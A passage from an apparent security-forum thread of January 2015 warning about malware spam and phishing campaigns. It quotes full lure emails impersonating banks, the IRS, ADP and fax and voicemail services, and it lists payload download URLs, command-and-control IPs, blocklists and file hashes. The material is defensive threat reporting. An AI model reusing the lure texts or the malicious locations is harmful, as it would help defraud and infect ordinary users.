0ce7690a209796b530b89f3cac89c90626785b84
09d5bc847f60ce3892159f717548d30e46cd53f0
1816a65aa497877b8f656b87550110e04ac972cd
bee66ab8460ad41ba0589c4f46672c0f8c8419f8 ..."
(More detail at the trendmicro URL at the top of this post.)
:fear: :mad:
AplusWebMaster
2015-01-13, 16:24
FYI...
Fake 'Nat West Secure Message' SPAM – PDF malware
- http://myonlinesecurity.co.uk/nat-west-new-secure-message-fake-pdf-malware/
13 Jan 2013 - "'You have a new Secure Message' pretending to come from NatWest <secure.message@ natwest .com> with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
You have received a encrypted message from NatWest Customer Support
In order to view the attachment please open it using your email client ( Microsoft Outlook, Mozilla Thunderbird, Lotus )
If you have concerns about the validity of this message, please contact the sender directly. For questions please contact the NatWest Bank Secure Email Help Desk at 0131 556 2313.
13 January 2015: SecureMessage.pdf.zip: Extracts to: SecureMessage.pdf.scr
Current Virus total detections: 1/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/1b8ea8bbd91995f7a9e1c5f6aaf8fa098940c40f025d20d4b00e34bb8839e288/analysis/1421155786/
___
Fake 'Tax return' SPAM
- http://blog.dynamoo.com/2015/01/malware-spam-johnsmithmail-irsgov-your.html
13 Jan 2015 - "This -fake- tax return spam leads to malware:
From: John Smith [mailto:john.smith@ mail-irs .gov]
Sent: 13 January 2015 11:13
Subject: Your tax return was incorrectly filled out
Attention: Owner/ Manager
We would like to inform you that you have made mistakes while completing the last tax form application (ID: 960164707883) .
Please follow the advice of our tax specialists HERE
Please amend the mistakes and send the corrected tax return to your tax agent as soon as possible.
Yours sincerely
The link in the email has a format such as:
http ://marypageevans .com/taxadmin/get_doc.html
http ://laser-support .co.uk/taxadmin/get_doc.html
A journey through some heavily obfuscated javascript follows... which eventually leads to a download called message.zip which contains a malicious executable tax_guide_pdf.exe which changes slightly every time it is downloaded. Incidentally, there seems to be a download limit of about 6 times, after which nonsense text is displayed instead. The .exe file has a VirusTotal detection rate of just 2/57* and Norman identifies it as Upatre. According to the Malwr report it connects to the following URLs:
http ://202.153.35.133 :19639/1301us23/HOME/0/51-SP3/0/
http ://202.153.35.133 :19639/1301us23/HOME/1/0/0/
http ://dstkom .com/mandoc/lit23.pdf
http ://202.153.35.133 :19657/1301us23/HOME/41/7/4/
It also drops a file (in this case called FbIpg60.exe) which has another low detection rate of just 2/57**. Fake IRS spam is quite common, if you don't deal with the IRS then blocking mail-irs .gov on your email gateway might help."
* https://www.virustotal.com/en/file/bd3147d1a6a06a59dc2362229a642a4de11fb0d49525b4333208530716bfe139/analysis/1421160583/
** https://www.virustotal.com/en/file/9cb95959bec83625a6cd9e2dd7d2261bc5715efb28124e600d9db357ea3912dc/analysis/1421161232/
202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/
___
Win7 - End of mainstream support
- http://windowssecrets.com/top-story/win7-reaches-milestone-prepare-for-its-demise/
Jan 8, 2015 - "... Most major Microsoft products have a formal life cycle that includes two key end-of-life dates. For Windows, those dates are listed on Microsoft’s “Windows lifecycle fact sheet” webpage.* The first date — End of mainstream support — effectively means that Microsoft will no longer offer free updates to the operating system. Once mainstream support ends for a specific version of Windows, it then enters its Extended support phase, during which Microsoft offers only essential fixes and security updates. (Companies can also pay for specific nonsecurity updates.) When an OS reaches its End of extended support milestone, all official support ends. Windows XP, as many Windows Secrets readers know, passed its “End of extended support” date on April 8, 2014. It has not had official updates of any kind since. (For more specifics on MS product life cycles, see the online “Microsoft support lifecycle policy FAQ.”) As noted in the “Windows lifecycle fact sheet,” Jan. 13 marks the end of mainstream support for all versions of Windows 7 SP1. What does that mean for the millions of us doing our daily computing on Win7 systems? Very soon, our operating systems will be essentially frozen — we’ll no longer receive any enhancements or nonessential fixes. We will, however, receive monthly security updates until Jan. 14, 2020, Win7’s official “End of extended support” date (at which point, Microsoft will want us on Windows 13 — or whatever it’s then called). Just as with XP this past April, Win7 systems should no longer receive updates of any kind after January 2020..."
* http://windows.microsoft.com/en-us/windows/lifecycle
- http://www.theinquirer.net/inquirer/news/2390045/microsoft-ends-mainstream-support-for-windows-7
Jan 13 2015
:fear: :mad:
AplusWebMaster
2015-01-14, 13:59
FYI...
Fake 'Invoice' SPAM – doc malware
- http://myonlinesecurity.co.uk/les-mills-invoice-word-doc-malware/
14 Jan 2015 - "'Les Mills Invoice' pretending to come from lmuk.accounts@ lesmills .com with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... As usual 2 slightly different -malware- versions. The email looks like:
Dear Customer,
Please find attached an invoice for Les Mills goods/services. Please note that for Licence Fee invoices the month being billed is the month in which the invoice has been raised unless otherwise stated within.
If you have any queries please email lmuk.accounts@ lesmills .com or call 0207 264 0200 and select option 3 to speak to a member of the team.
Best regards,
Les Mills Finance Team
14 January 2015 : Les Mills SIV035931.doc - Current Virus total detections: 0/57* : 0/55**
... All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/3dbc665b89a7a99de58614e905d4fa6105194e6d46d6d36f6756867bcd596564/analysis/
** https://www.virustotal.com/en/file/328929f0fbfa8c28e234741138e2e48a8ab5992d36e5eaaf62017abc57f47b11/analysis/1421225265/
- http://blog.dynamoo.com/2015/01/malware-spam-les-mills-invoice.html
14 Jan 2015
"... Recommended blocklist:
59.148.196.153
74.208.11.204
81.27.38.97
okurimono.ina-ka .com "
___
Fake 'SEPA' SPAM – doc malware
- http://myonlinesecurity.co.uk/senior-accounts-payable-sepa-remittance-advice-word-doc-malware/
14 Jan 2015 - "'Senior Accounts Payable SEPA REMITTANCE ADVICE 2503.62 EUR 12 JAN 2014' with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Good Afternoon
Please see attached a copy of remittance advice for SEPA payment of 2503.62 EUR made on 12/01/2015
Regards,
Victoria Mack
Senior Accounts Payable
14 January 2015 : SE827QR.doc - Current Virus total detections: 0/57*
... All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/647d4115b9a7a77076ec268a480cf898d18433929664200e1b336ecfdc357fcd/analysis/1421236177/
___
Fake Fax SPAM - PDF malware
- http://myonlinesecurity.co.uk/nextiva-vfax-fake-pdf-malware/
14 Jan 2015 - "'Fax Received: Fax Server | 1/14/2015 8:21 AM' pretending to come from Nextiva vFax <notifications@ nextivafax .com> with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
HI ...
Delivery Information:
Message #: 131177970
Local Number: 4853872678
Remote CSID: Fax Server
Total Pages: 2
Transmit Time: 3 min 41.000 sec
Click here to view this message ...
Delivered by vFax… “When Every Fax is Mission Critical”
14 January 2015: fax_message_01142015_784398443.pdf.zip ( 83kb): Extracts to: fax_message_01142015_784398443.pdf.scr - Current Virus total detections: 3/55*
This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/dbc7a917aa4137ef6ef6b3d169b92e6100f44079ca07f79067469f871beffdd5/analysis/1421251998/
___
Malware sites offering Oracle 'patches'
- https://blogs.oracle.com/proactivesupportDI/entry/malware_sites_offering_oracle_patches
Jan 14, 2015 - "It has come to our attention that there are non-Oracle sites offering Oracle 'fixes' for genuine Oracle error messages... If you do encounter one of these sites please inform us immediately via Communities* or create a SR and we will rectify the situation... Proactive Support are already investigating some known sites..."
* https://community.oracle.com/
___
Outlook Phish
- https://blog.malwarebytes.org/fraud-scam/2015/01/avoid-this-outlook-phish/
Jan 14, 2015 - "... phish mail in circulation... for Outlook accounts. The email reads as follows:
Dear Microsoft User,
Please note we have temporary blocked your account from receiving e-mails, because we detected fraudulent and spam activities from your mail box to some blacklisted email address, So for your own safety verify your account.
If a verification respond is not gotten from you in the next 24 hours, we are sorry we will be forced to permanently disable and delete your account from Microsoft Account.
To verify your Microsoft account, Click Here
We regret Any inconvenience.
Thanks,
The Microsoft account team
Clicking the link in the email – sbmarticles(dot)com/Z-zone/SigrypAmt2nd(dot)htm*, which has already popped up on Phishtank – takes potential victims to a spot of data URI phishing**.
> https://blog.malwarebytes.org/wp-content/uploads/2015/01/uriphish1-300x186.jpg
Don’t be tricked into filling in login details via these types of attack – any email asking you to login or enter personal information (especially when warning you about account suspensions, unusual activity or any other form of shenanigans) should be treated with a generous helping of caution."
* 192.190.80.53: https://www.virustotal.com/en/ip-address/192.190.80.53/information/
** http://www.csoonline.com/article/2154202/social-engineering/phishing-attack-using-data-uris-to-target-google-accounts.html
:fear::fear: :mad:
AplusWebMaster
2015-01-15, 15:32
FYI...
Fake 'invoice' SPAM - malware attached
- http://blog.dynamoo.com/2015/01/malware-spam-hexis-uk-limited-invoice.html
15 Jan 2015 - "This -fake- invoice has a malicious attachment. It does not comes from Hexis UK Ltd, it is a forgery. Hexis is not sending the spam, nor have their systems been compromised in any way.
From: Invoice from Hexis [Invoice@ hexis .co.uk]
Date: 15 January 2015 at 06:36
Subject: Invoice
Sent 15 JAN 15 08:30
HEXIS (UK) LIMITED
7 Europa Way
Britannia Park
Lichfield
Staffordshire
WS14 9TZ
Telephone 01543 411221
Fax 01543 411246
Attached is a malicious Word document S-INV-CREATIFX-465219.doc which actually comes in -two- different versions (perhaps more) with low detection rates [1] [2] containing two slightly different macros... which download a component from one of the following locations:
http ://dramakazuki.kesagiri .net/js/bin.exe
http ://cassiope .cz/js/bin.exe
This has a VirusTotal detection rate of 3/57*. That report shows the malware phoning home to 74.208.11.204:8080 (1&1 Internet, US) which is a familiar C&C server which you should definitely block traffic to. My sources also identify a couple of other IPs, giving a recommended blocklist of:
59.148.196.153
74.208.11.204
81.27.38.97
UPDATE: the Malwr report shows that it drops a DLL with a VirusTotal detection rate of just 1/57**."
1] https://www.virustotal.com/en/file/6d3694dbebbcdba2899603354f299fba7a7781c6bc092877354cd96e635b4a4b/analysis/1421314924/
2] https://www.virustotal.com/en/file/7db49013954e8864a5ad8bb6189ee7ab3917efff426b4e07670a335c68280bdb/analysis/1421314937/
* https://www.virustotal.com/en/file/87f639a395dc72d9fa2aa517ec2776ee3c9e9c2fa71ba50d832e0ff012373b22/analysis/1421315774/
** https://www.virustotal.com/en/file/105fe9735add6aec937c9e6f611d512511c050895fd863a216d25980c54fad45/analysis/1421318457/
- http://myonlinesecurity.co.uk/hexis-uk-limited-invoice-word-doc-malware/
15 Jan 2015
* https://www.virustotal.com/en/file/6d3694dbebbcdba2899603354f299fba7a7781c6bc092877354cd96e635b4a4b/analysis/1421309107/
** https://www.virustotal.com/en/file/7db49013954e8864a5ad8bb6189ee7ab3917efff426b4e07670a335c68280bdb/analysis/1421309412/
___
Fake 'Payment request' SPAM - malware attachments
- http://blog.dynamoo.com/2015/01/malware-spam-payment-request-of-417694.html
15 Jan 2015 - "This -spam- comes with a malicious Word document attached:
from: Alan Case
date: 15 January 2015 at 08:49
subject: Payment request of 4176.94 (14 JAN 2015)
Dear Sirs,
Sub: Remitance of GBP 4176.94
This is with reference to the above, we request you to kindly remit GBP 4176.94 in favor of our bank account.
For more information on our bank details please refer to the attached document.
Thanking you,
Alan Case Remittance Manager
Other names and job titles seen... The payment amount, name and job title change in each spam, as does the name of the attachment (although this following the format ADV0000XX). There are three malicious Word documents that I have seen, each with a low detection rate at VirusTotal [1] [2] [3] which in turn contain a slightly different macro... which attempt to download another component from one of the following locations:
http ://95.163.121.71 :8080/mopsi/popsi.php
http ://95.163.121.72 :8080/mopsi/popsi.php
http ://136.243.237.204 :8080/mopsi/popsi.php
Note the two adjacent IPs of 95.163.121.71 and 95.163.121.72 which belong to Digital Networks CJSC in Russia (aka DINETHOSTING), an IP range of 95.163.64.0/18 that I would recommend you consider blocking. 136.243.237.204 is a Hetzner IP. The macro downloads a file g08.exe from these locations which is then saved as %TEMP%\UGvdfg.exe. This has a VirusTotal detection rate of 4/57*. That VT report also shows the malware attempting to POST to 194.146.136.1:8080 (PE "Filipets Igor Victorovych", Ukraine) which is a well-known bad IP. The Malwr report is inconclusive, but this exectuable probably drops a Dridex DLL.
Recommended blocklist:
194.146.136.1
95.163.121.71
95.163.121.72
136.243.237.204
UPDATE: the following -are- Dridex C&C servers which you should also block:
80.237.255.196 "
1] https://www.virustotal.com/en/file/58aa6018bb493f02a4981adc395bda36a62235286b804eac6c493b16a7e76881/analysis/1421313787/
2] https://www.virustotal.com/en/file/27d465eb58e46936afa1fea9efd2af211d8b57db447088e69d791b6f302b322d/analysis/1421313798/
3] https://www.virustotal.com/en/file/d1fd0df8db5c3283426d945be8e6cb466c455a1b1a9a534b5f1d33b3c81c5f09/analysis/1421313810/
* https://www.virustotal.com/en/file/f4c36c6e702324f0edb9fd62d2d50bb08c6507ff53847f2816870414dff53eaf/analysis/1421313825/
- http://myonlinesecurity.co.uk/payment-request-14-jan-2015-word-doc-malware/
15 Jan 2015
15 January 2015 : ADV0291LO.doc - Current Virus total detections: 3/55*
15 January 2015 : 57959SI.xls (35 kb) - Current Virus total detections: 3/57**
| 3093720WF.xls (47 kb) - Current Virus total detections: 2/57***
* https://www.virustotal.com/en/file/27d465eb58e46936afa1fea9efd2af211d8b57db447088e69d791b6f302b322d/analysis/1421309631/
** https://www.virustotal.com/en/file/0d8ebd5567fc7c9fdb87dc36673bb5b4e4f193efacfdd6bfddc36dc5b2422325/analysis/1421316140/
*** https://www.virustotal.com/en/file/a537774596d7ac16ca41e6f468c76c807747279de12ccb28b489322aee0b92df/analysis/1421315881/
___
Fake 'open24 .ie important changes alert' SPAM – malware
- http://myonlinesecurity.co.uk/open24-ie-important-changes-servicesemail-alert-malware/
15 Jan 2015 - "'Some important changes to some services' (email alert) pretending to come from Open24 <inf01@ open24 .ie> is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Fwd: Software Upgrade
Dear
Open24 Customer,
We have now implemented a number of
changes to our Internet Banking service. This is to ensure the highest
level of security of information passing between you and our server.
To have access to this service, simply follow the button below and activate the service...
Kind regards
Open24
This email is personal & confidential and is intended for the recipient only...
15 January 2015: open24changes.zip (523 kb) : Extracts to: Payment.scr
Current Virus total detections: 17/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/190aaa3ee308ecab4609e7229ee654fb7ab34044d324d65658b2789a9858a768/analysis/1421332957/
___
Fake 'ADP Invoice' SPAM – PDF malware
- http://myonlinesecurity.co.uk/johnny-west-adp-invoice-week-ending-01112015-fake-pdf-malware/
15 Jan 2015 - "'ADP Invoice for week ending 01/11/2015' pretending to come from Johnny.West@ adp .com with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Your most recent ADP invoice is attached for your review.
If you have any questions regarding this invoice, please contact your ADP service team at the number provided on the invoice for assistance.
Please note that your bank account will be debited within one banking business day for the amount(s) shown on the invoice.
Thank you for choosing ADP for your business solutions.
Important: Please do not respond to this message. It comes from an unattended mailbox.
15 January 2015: invoice_418270412.pdf.zip (11kb): Extracts to: invoice_418270412.pdf.scr
Current Virus total detections: 5/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/a33b2a98df1b9b973471de47ad8fc750278a42890ed5924bf3ea23cbd448db7d/analysis/1421335768/
... Behavioural information
TCP connections
202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/
174.120.16.66: https://www.virustotal.com/en/ip-address/174.120.16.66/information/
69.49.101.51: https://www.virustotal.com/en/ip-address/69.49.101.51/information/
___
Fake 'HSBC Payment Advice' SPAM – PDF malware
- http://myonlinesecurity.co.uk/hsbc-payment-advice-advice-refgb956959-chaps-credits-fake-pdf-malware/
15 Jan 2015 - "'Payment Advice – Advice Ref:[GB956959] / CHAPS credits' pretending to come from HSBC Advising Service [mailto:Bankline.Administrator@ nutwest .com] is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and follow the link or open the attachment... The email looks like:
Sir/Madam,
Please download document from dropbox, payment advice is issued at the request of our customer. The advice is for your reference only.
Download link: <redacted>
Yours faithfully,
Global Payments and Cash Management
HSBC ...
When you follow the... link you get a page looking like this, where depending on which browser you are using, you might get a direct download of the zip file containing the -malware- or you might get the message to follow the link... which will give you the malware:
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/avralab.jpg
15 January 2015: doc974_pdf.zip (11kb) : Extracts to: doc963_pdf.exe
Current Virus total detections: 4/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/4c00deb8efcca9de6a86809eeb6613037d4820a56923bf4c262367c4c744f69e/analysis/1421341083/
... Behavioural information
TCP connections
202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/
66.147.240.173: https://www.virustotal.com/en/ip-address/66.147.240.173/information/
:fear::fear: :mad:
AplusWebMaster
2015-01-16, 13:53
FYI...
Affordable Care Act Phishing Campaign
- https://www.us-cert.gov/ncas/current-activity/2015/01/15/Affordable-Care-Act-Phishing-Campaign
Jan 15, 2015 - "US-CERT is aware of a phishing campaign purporting to come from a U.S. Federal Government Agency. The phishing emails reference the Affordable Care Act in the subject and claim to direct users to health coverage information, but instead direct them to sites which attempt to elicit private information or install malicious code. US-CERT encourages users to take the following measures to protect themselves:
- Do not follow links or download attachments in unsolicited email messages.
- Maintain up-to-date antivirus software.
- Refer to the Avoiding Social Engineering and Phishing Attacks Security Tip* for additional information on social engineering attacks..."
* https://www.us-cert.gov/ncas/tips/ST04-014
___
Fake 'voice mail' SPAM - PDF malware
- http://myonlinesecurity.co.uk/microsoft-outlook-voicemail-received-voice-mail-fake-pdf-malware/
16 Jan 2015 -"'You have received a voice mail' pretending to come from Microsoft Outlook Voicemail <no-reply@your own domain>with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
You received a voice mail : VOICE549-693-8777.wav (20 KB)
Caller-Id: 549-693-8777
Message-Id: 8X3NI1
Email-Id: a.j.lefeber14d @ ...
This e-mail contains a voice message.
Download and extract the attachment to listen the message.
Sent by Microsoft Exchange Server
They are not being sent by your own server or email server, but by one of the botnets...
16 January 2015: VOICE44982109219.zip (11kb) : Extracts to: VOICE44982109219.scr
Current Virus total detections: 4/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/e1c3617c620614697485b45bb6760e94cea16758c15fa0374629c4a15b54be08/analysis/1421413445/
... Behavioural information
TCP connections
202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/
192.185.16.192: https://www.virustotal.com/en/ip-address/192.185.16.192/information/
UDP communications
198.27.81.168: https://www.virustotal.com/en/ip-address/198.27.81.168/information/
192.95.17.62: https://www.virustotal.com/en/ip-address/192.95.17.62/information/
___
Adobe Phish back in-the-Wild
- https://blog.malwarebytes.org/fraud-scam/2015/01/adobe-phish-back-in-the-wild/
Jan 15, 2015 - "We recently found a -compromised- site serving what appears to be an Adobe phish. Like most phishing campaigns, this one may have originated from a spammed email. Although we do not have the actual sample of said email, it pays to be familiar with what the fraud page looks like and its content, too. Please direct your attention to the screenshot below:
> https://blog.malwarebytes.org/wp-content/uploads/2015/01/00-default.png
We can deduce from the page’s content that the spam may have originated from a spoofed Adobe address, promising an important document the recipient has to see. In order to do so, they are then instructed to access their Adobe account by entering their email credentials, specifically for AOL, Gmail, Outlook, and Yahoo! The page also caters to credentials for other email providers. Visitors clicking either of the email service brands at the right side of the page changes the user entry fields at the left side to match with the look of the real thing... Some of us may quickly and easily identify that the whole thing is a phishing campaign, but some may also not realize this until it’s too late. Be extra careful when dealing with emails purporting to have come from Adobe... It also pays to remain informed and read Adobe’s page here* on how to avoid falling for phishing schemes."
* https://www.adobe.com/security/prevent-phishing.html
___
North Korean News Agency site serves File Infector
- http://blog.trendmicro.com/trendlabs-security-intelligence/north-korean-news-agency-website-serves-file-infector/
Jan 16, 2015 - "We were recently alerted to reports* claiming that the website North Korea’s official news service, www.kcna .kp, had been delivering -malware- via embedded malicious code. One of the photo spreads on the website was found to contain malware that launched a watering hole attack on individuals who came to visit the website and its other pages. Below is an infection diagram for the malware associated with this attack:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/01/Diagram2.jpg
The mother file in this attack is detected as PE_WINDEX.A-O. As seen in the diagram above, the executable file mscaps.exe drops wtime32.dll, which contains the infection code and backdoor routine. Another executable file mscaps.exe injects code to explorer.exe to stay memory resident. As such, every time the affected system reboots, the malware runs on the system and begins its infection routine. Explorer.exe executes the infection code and targets .EXE files in drive types that are removable or shared, with drive letters traversed from A-Z. We observed that it skips fixed drives. Apart from explorer.exe, this file infector looks for the following processes where it injects its malicious code:
iexplore.exe
ieuser.exe
firefox.exe
chrome.exe
msimn.exe
msnmsgr.exe
outlook.exe
winmail.exe
yahoomessenger.exe
ftp.exe
The website contains an -infected- .ZIP file named FlashPlayer.zip. Our initial analysis shows that the outdated Flash Player installer drops the main file infector WdExt.exe, which we detect as PE_WINDEX.A-O. It copies and renames the file Ws2_32.dll, which is the file for the Windows Sockets API used by most Internet and network applications to handle network connections. PE_WINDEX.A-O also creates the file SP{random}.tmp, which contains system information that may be responsible for the malware’s information theft routines. It gathers data such as date and time, computer name, user name, OS information, MAC address, and more. The embedded malicious code runs on Internet Explorer version 11.0, Mozilla Firefox versions 10.0.9 and 36.0, Safari versions 7.0.3 and 4.0, Opera version 9.00 and 12.14, and Google Chrome 41.0.2228.0. The browsers we tested all displayed the code snippet that includes /download/FlashPlayer10.zip. Based on replicating the attack with an infected sample (calc.exe), we noticed that the file size is almost the same size as the mother file infector, PE_WINDEX.A-O. Additional analysis also shows that PE_WINDEX.A-O has developer metadata that lists its copyright as © Microsoft Corporation. All rights reserved with its publisher is listed as Microsoft Corporation. Its description and comments contain the text Windows Defender Extension, among other listed information. This may be a disguise for the malware so that users won’t be suspicious about the file..."
* http://arstechnica.com/security/2015/01/surprise-north-koreas-official-news-site-delivers-malware-too/
___
Google finally quashes month-Old Malvertising Campaign
- http://it.slashdot.org/story/15/01/16/0129244/google-finally-quashes-month-old-malvertising-campaign
Jan 16, 2015 - "Since the middle of December, visitors to sites that run Google AdSense ads have intermittently found themselves -redirected- to other sites featuring spammy offerings for anti-aging and brain-enhancing products*. While webmasters who have managed to figure out which advertisers are responsible could quash the attacks on their AdSense consoles, only now has Google itself managed to track down the villains and -ban- them from the service."
* http://www.itworld.com/article/2871035/google-nixes-widespread-malvertising-attack.html
Jan 14, 2015
:fear::fear: :mad:
AplusWebMaster
2015-01-17, 18:45
FYI...
iTunes invoice – phish
- http://myonlinesecurity.co.uk/itunes-invoice-id31wx175t-phishing/
17 Jan 2015 - "'ITunes Your invoice #ID31WX175T' pretending to come from iTunes Store <do_not_reply@ btconnect .com> is one of the latest -phish- attempts to steal your Bank, credit card and personal details. This one is slightly different to usual ones in that it is designed to make you think that it is a mistake and that you need to enter all your bank/credit card details in order to -cancel- the transaction that you never made in the first place... persuading the recipient that somebody must have compromised their ITunes account and telling you to change all the details in it... not only would you lose a lot of money but could also end up losing a lot more. This one only wants your personal details and your credit card and bank details. Many of them are also designed to specifically steal your email, facebook and other social network log in details as well*...
* http://myonlinesecurity.co.uk/how-to-protect-yourself-and-tighten-security/
looks at first glance like the genuine Itunes website but you can clearly see in the address bar, that it is fake. Some versions of this phish will ask you fill in the html (webpage) form that comes attached to the email. If you open the attached html file you see a webpage looking like:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/Apple-Store-Purchase-Confirmation.png
When you fill in your user name and password you get a page looking like this, where the phishers try to validate your details to make sure that you are entering “genuine ” information. They make sure that the bank account numbers have the correct number of digits and that the credit card numbers have the correct number of digits and format...make sure you have “show known file extensions enabled“, And then look carefully at the unzipped file. If it says .EXE then it is a problem and should -not- be run or opened."
:fear: :mad:
AplusWebMaster
2015-01-19, 15:09
FYI...
Fake 'order payment slip' SPAM - malware
- http://myonlinesecurity.co.uk/pierre-jude-bukasonventure-com-re-order-payment-slip-malware/
19 Jan 2015 - "'RE: order payment slip' coming from info@ bukasonventure .com with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
This is just to inform you that we have made the payment as Requested.
We try to contact you about the payment we made here in our office, but because the payment was made on Friday evening before the bank closed, and our server was down,
PLEASE REFER TO THE ATTACHMENT SLIP
Best regards,
Mr Pierre Jude Genaral Manager
323 Collier Road, Bayswater WA 6053
Phone: (1) 9379 0811
Fax: (1) 9379 0822 ...
These actually look they they are coming from bukasonventure .com which is hosted in USA and was only registered on 15 January 2015. This might be compromised server, have an open relay allowing the emails to be sent or have been registered under a false set of details with the aim of sending malicious emails and spam. The more I look at this one, the more I am convinced the entire set up has been done with the aim of distributing malware. The domain was registered on 15 January 2015. The computer sending IP 120.140.55.192 is listed as Malaysia...
19 January 2015: order-slip.rar : Extracts to: order-slip.exe
Current Virus total detections: 23/56* ... All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/cbf4c8a93ae637d8436ede424b617003105b094cced64c712ec25c68c3a61988/analysis/1421652817/
___
Verizon vuln exposed email accounts - “zombie cookies”
- http://www.securityweek.com/verizon-fixes-vulnerability-exposing-user-email-accounts
Jan 19, 2015 - "... discovered the flaw while analyzing the Android app for Verizon’s fiber optic Internet, telephone and television service FiOS. While investigating the requests sent by the application, the expert noticed a username parameter called uid. By changing the value of this parameter with a different customer’s username, Westergren got the contents of the targeted user’s email account. The researcher* later determined that other API methods for this particular widget were affected as well. For example, by changing the values of the uid and mid parameters in a certain request, he could read individual emails. even managed to send out an email on another user’s behalf by exploiting the vulnerability... The proof-of-concept was sent to Verizon’s security team on January 14. The telecoms giant -confirmed- the existence of the issue by the next day. The vulnerability was fixed on January 16. For responsibly disclosing the security hole, Westergren was rewarded with free FiOS Internet for one year... had been using so-called “zombie cookies” to track subscribers even if they had used private browsing, cleared their cookies, or if they had opted out. The existence of Verizon’s controversial system came to light last year, but the company -denied- using the tracking method in its own business model. After being exposed... announced on Friday that it will suspend its “zombie cookies” program..."
* http://randywestergren.com/critical-vulnerability-verizon-mobile-api-compromising-user-email-accounts/
___
LockHeedMartin Fax Spam
- http://threattrack.tumblr.com/post/108560007998/lockheedmartin-fax-spam
Jan 19, 2015 - "Subjects Seen:
[Lockheed Martin UK Ltd Integrated Systems] New fax message - LFQ.71021C670.3249
Typical e-mail details:
FAX: +07755-090107
Date: 2015.01.18 17:33:18 CST
Pages: 4
Reference number: LFQ.71021C670.3249
Filename: curbed.zip
—
Lockheed Martin UK Ltd Integrated Systems Michaele Vivas
Malicious URLs:
breteau-photographe .com/tmp/pack.tar.gz
voigt-its .de/fit/pack.tar.gz
maisondessources .com/assets/pack.tar.gz
pleiade.asso .fr/piwigotest/pack.tar.gz
scolapedia .org/histoiredesarts/pack.tar.gz
Malicious File Name and MD5:
curbed .scr (BDFE7EB4A421B9A989C85BFFF7BACE2C)
1715030703 .exe (4ebd076047a04290f23f02d6ecd16fee)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/93353be3c5a5dd804da246f3da7ec037/tumblr_inline_nifqztQaEr1r6pupn.png
Tagged: LockHeedMartin, Citroni, dalexis
___
Fake 'Natwest' SPAM - leads to malware
- http://blog.dynamoo.com/2015/01/malware-spam-natwest.html
19 Jan 2015 - "This spam claiming to be from NatWest bank (or is it nEtwest?) leads to malware.
From: NatWest [donotreply@ netwest .uk]
Date: 19 January 2015 at 14:02
Subject: Important - Please complete attached form ...
Dear Customer
Please find below your Banking Form for Bankline.
<URL redacted>
